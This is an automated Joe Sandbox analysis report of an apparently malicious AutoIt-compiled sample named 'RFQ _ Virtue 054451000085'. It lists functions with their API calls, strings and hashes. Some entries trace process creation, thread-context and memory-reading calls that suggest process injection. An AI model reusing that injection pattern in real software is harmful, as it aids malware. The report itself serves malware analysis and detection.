>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 004037AE
/AutoIt3ExecuteLine, xrefs: 004038A7
CMDLINE, xrefs: 00403822
RL, xrefs: 0043D213
/ErrorStdOut, xrefs: 0040387D
/AutoIt3OutputDebug, xrefs: 00403892
CMDLINERAW, xrefs: 004037FB
/AutoIt3ExecuteScript, xrefs: 004038BC

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RL
API String ID: 1825951767-3937808951
Opcode ID: bdb735fbedb35e888c257e8634ea341575bcf89834c003d18e08814175aecafe
Instruction ID: 217e4a9907ead401ca9bb1711b2953d037e75f133ca24ff269f2dfb0051b1760
Opcode Fuzzy Hash: bdb735fbedb35e888c257e8634ea341575bcf89834c003d18e08814175aecafe
Instruction Fuzzy Hash: DAA13CB29102199ACB04EFA1DC91EEEBB78BF14314F40053FE415B7191DB786A08CBA9

Function 0040F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00420162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
Part of subcall function 00420162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
Part of subcall function 00420162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
Part of subcall function 00420162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1

Part of subcall function 004160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040F930), ref: 00416154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040F9CD
OleInitialize.OLE32(00000000), ref: 0040FA4A
CloseHandle.KERNEL32(00000000), ref: 004445C8

Strings

\TL, xrefs: 0040F7F7
SL, xrefs: 0040F7EB
<WL, xrefs: 0040F930
%I, xrefs: 0040F796, 0040F7A8, 0040F96E, 0040FA51

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <WL$\TL$%I$SL
API String ID: 1986988660-4199584472
Opcode ID: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
Instruction ID: cacde0f204b6a9090d7281a683cdea215049a4593ae0d5a2ec8f4d386ae10ecf
Opcode Fuzzy Hash: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
Instruction Fuzzy Hash: 6581ADB4901A809EC3C8EF3AA944F5D7BE5AB9830A790853F9419C7272E77874C58F1D

Function 00E80990 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E80A61
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E80C87

Memory Dump Source

Source File: 00000000.00000002.1541781702.0000000000E7E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E7E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e7e000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
Instruction ID: 9fa2cec959811ba63a26813076054d2f73149a16b66ba6851ee740816629a15a
Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
Instruction Fuzzy Hash: 14A12770E00208EBDB54DFA4C895BEEB7B5FF48308F209199E519BB280D7759A45CF94

Function 004039D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
ShowWindow.USER32(00000000,?,?), ref: 00403A38
ShowWindow.USER32(00000000,?,?), ref: 00403A41

Strings

edit, xrefs: 00403A1E
AutoIt v3, xrefs: 004039FB, 00403A00, 00403A01

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
Instruction ID: be7595edf0713681b26590b93805f6b8ae52c85786ba9eb407d90bea5093dcab
Opcode Fuzzy Hash: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
Instruction Fuzzy Hash: 5DF03A705002907EEB705723AC48E2F2EBDD7C6F50B00407EB900E2170C2752881CEB8

Function 00E80730 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E80620: Sleep.KERNEL32(000001F4), ref: 00E80631

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E80884

Strings

IPA4938ANSLAQ359FUNZJ3, xrefs: 00E808E7, 00E808EA

Memory Dump Source

Source File: 00000000.00000002.1541781702.0000000000E7E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E7E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e7e000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: CreateFileSleep
String ID: IPA4938ANSLAQ359FUNZJ3
API String ID: 2694422964-3298337019
Opcode ID: a204c728e1cf5e02c6f4b9b5ccf306ebd95bff7c7fe146373a8c3180137cd667
Instruction ID: 5343ce5695c8413148b56545f46e043d6d2f1bb88914a3807e39d786fce825b0
Opcode Fuzzy Hash: a204c728e1cf5e02c6f4b9b5ccf306ebd95bff7c7fe146373a8c3180137cd667
Instruction Fuzzy Hash: EE619230D04248DAEF11DBE4D854BEEBB79AF59304F104199E24CBB2C1D6BA1B49CBA5

Function 0040407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D3D7

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

_memset.LIBCMT ref: 004040FC
_wcscpy.LIBCMT ref: 00404150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160

Strings

Line: , xrefs: 0043D400

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: d21009a627d630a93433c35e80ef480998eb63dd03275a386dfb8ac04053bcd4
Instruction ID: 5bc5e1414a994c2bc470de53771d73d2d6dd5f3f474fa0ef1b1349c24bbf7672
Opcode Fuzzy Hash: d21009a627d630a93433c35e80ef480998eb63dd03275a386dfb8ac04053bcd4
Instruction Fuzzy Hash: 0C31A0B1408305AAD360EB61DC45FDF77E8AB84308F10493FB685A21D1DB78A649CB9F

Function 0040686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00404DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F

_free.LIBCMT ref: 0043E263
_free.LIBCMT ref: 0043E2AA

Part of subcall function 00406A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD

Strings

Bad directive syntax error, xrefs: 0043E292
>>>AUTOIT SCRIPT<<<, xrefs: 0043E039

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 5ac2f0876360858f4a4f7a23d1b92b3e6bd507ffeb279676637779cb54c060a0
Instruction ID: bc1048028433ed9b22f3ef3a1c1c6008be5ef254c57e4e777beaa03c5b85f979
Opcode Fuzzy Hash: 5ac2f0876360858f4a4f7a23d1b92b3e6bd507ffeb279676637779cb54c060a0
Instruction Fuzzy Hash: 0D916E71901229AFCF04EFA6C8419EEB7B4FF08314F10446FE815AB2E1DB78A955CB59

Function 004035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
RegCloseKey.KERNEL32(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617

Strings

Control Panel\Mouse, xrefs: 004035D2

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
Instruction ID: b1ff216ba3ee978410a1c1c06e663b0c2c98cd46aaa17f39490786bf8a1b1252
Opcode Fuzzy Hash: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
Instruction Fuzzy Hash: 84114871510208BFDB20CF64DC409AFBBBCEF45741F10486AE805E7250D6729E449768

Function 00E7F620 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 00E7FDDB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E7FE71
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00E7FE93

Memory Dump Source

Source File: 00000000.00000002.1541781702.0000000000E7E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E7E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e7e000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
Instruction ID: 952279bc4d1e82e58fde4c88253ba0358d72af7d6612106747cfe8a4be183c27
Opcode Fuzzy Hash: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
Instruction Fuzzy Hash: 49621A30A14258DBEB24DFA4C850BDEB376EF58300F1091A9D10DFB2A0E7769E85CB59

Function 0046955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD

Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837

_free.LIBCMT ref: 004696A2
_free.LIBCMT ref: 004696A9
_free.LIBCMT ref: 00469714

Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B

_free.LIBCMT ref: 0046971C

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: ca2eec8eb8578c2366e6fbf42eaf411172dd757ca1b938988fe54b4571807f9b
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: 88515EB1904219ABDF249F65DC81A9EBB79EF88304F1044AEF209A3241DB755E90CF59

Function 0042470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004247A0
__flush.LIBCMT ref: 004247C0
__write.LIBCMT ref: 004247F3
__flsbuf.LIBCMT ref: 00424821

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 7e2b6cc7ad03bd9c76499a1e37937a2f988b0f8539bc111f38111bac958280d8
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 9341D434B006659BDB189F69E88096F7BA5EFC2364B50813FE82587640DB78DD418B48

Function 00B7B180 Relevance: 6.1, APIs: 4, Instructions: 95fileCOMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 00B7B2BA
WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 00B7B2E0

Memory Dump Source

Source File: 00000000.00000002.1541018921.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: File$PointerWrite
String ID:
API String ID: 539440098-0
Opcode ID: 31d1dbf11d86c586347ee0a4a855d954206b7a782823b218fc83e8c250945dc9
Instruction ID: b1023af1c2a7e92061c046face190464fba960f27da5cf76490bbfb90a9b435d
Opcode Fuzzy Hash: 31d1dbf11d86c586347ee0a4a855d954206b7a782823b218fc83e8c250945dc9
Instruction Fuzzy Hash: 87318F6050D384AED7118B298859F2FBFE0AF92714F89C5CDE4BC96291D3B888489F57

Function 004044A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004044CF

Part of subcall function 0040407C: _memset.LIBCMT ref: 004040FC
Part of subcall function 0040407C: _wcscpy.LIBCMT ref: 00404150
Part of subcall function 0040407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160

KillTimer.USER32(?,00000001,?,?), ref: 00404524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00404533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D4B9

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
Instruction ID: dcb2c65cf3c1a774e1d203f737fabc32089307ed9affa8f53aec521d9447171b
Opcode Fuzzy Hash: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
Instruction Fuzzy Hash: 6F21FBB0904754AFE7328B249C45BEBBBEC9B55318F0404AFE79A56281C3782984CB49

Function 00404C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00404CBA

Strings

AU3!P/I, xrefs: 00404CB4
EA06, xrefs: 0043D8CC

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/I$EA06
API String ID: 4104443479-1914660620
Opcode ID: 9c66a10a8673985021788653dd36bc4fd35b7771d48e8ec4f3bf100b67519411
Instruction ID: ff6ab1fe0fa27ea81cbcababf34b5742e04188ff143208347500ec0318cc5285
Opcode Fuzzy Hash: 9c66a10a8673985021788653dd36bc4fd35b7771d48e8ec4f3bf100b67519411
Instruction Fuzzy Hash: F1418AB1A0415867DB219B6498517BF7BA19FC5304F28407BEE82BB3C2D63C5D4583AA

Function 00407285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0043EA39
GetOpenFileNameW.COMDLG32(?), ref: 0043EA83

Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770

Part of subcall function 00420791: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0

Strings

X, xrefs: 0043EA51

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
Instruction ID: baa1e7331fae4d359aac7897d23b5e8ce5a65ce190648e6f88e75d23560a4c0c
Opcode Fuzzy Hash: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
Instruction Fuzzy Hash: 4421A471A102589BCB41DF95D845BDE7BF8AF49314F00806FE508B7281DBB85989CFAA

Function 004698E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F

Strings

aut, xrefs: 00469909

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
Instruction ID: d76eb4abf93f0e171a782776cb2de2514a1bc3ee8d101bd4a6c1c3d5b9ef8161
Opcode Fuzzy Hash: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
Instruction Fuzzy Hash: D0D05E7954030DABDB50ABA0DC0EFDA773CE704700F0006F5BA54D10A1EAB1A5988BA9

Function 0047CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
